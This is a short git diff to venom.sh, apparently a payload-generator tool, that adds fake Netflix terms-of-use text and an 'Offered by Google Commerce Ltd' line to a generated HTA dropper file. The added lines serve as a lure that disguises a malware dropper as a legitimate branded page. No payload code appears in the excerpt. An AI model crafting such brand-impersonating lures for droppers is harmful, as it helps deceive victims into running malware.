diff --git a/venom.sh b/venom.sh
index 09bfd41b..39d1cf88 100755
--- a/venom.sh
+++ b/venom.sh
@@ -13947,6 +13947,11 @@ if [ "$easter_egg" = "ON" ]; then
echo "We have award-winning series, films, documentaries and stand-up comedy specials. In addition,
" >> $IPATH/output/$Drop.$Ext
echo "with the mobile application you can watch Netflix on the go, on public transport or on a break.
" >> $IPATH/output/$Drop.$Ext
echo "" >> $IPATH/output/$Drop.$Ext
+ echo "For full terms and conditions, visit http://www.netflix.com/termsofuse
" >> $IPATH/output/$Drop.$Ext
+ echo "" >> $IPATH/output/$Drop.$Ext
+ echo "Offered by
" >> $IPATH/output/$Drop.$Ext
+ echo "Google Commerce Ltd" >> $IPATH/output/$Drop.$Ext
+ echo "" >> $IPATH/output/$Drop.$Ext
fi
echo "" >> $IPATH/output/$Drop.$Ext
echo "${BlueF}[${YellowF}i${BlueF}]${white} Dropper.hta html file written to output.";sleep 1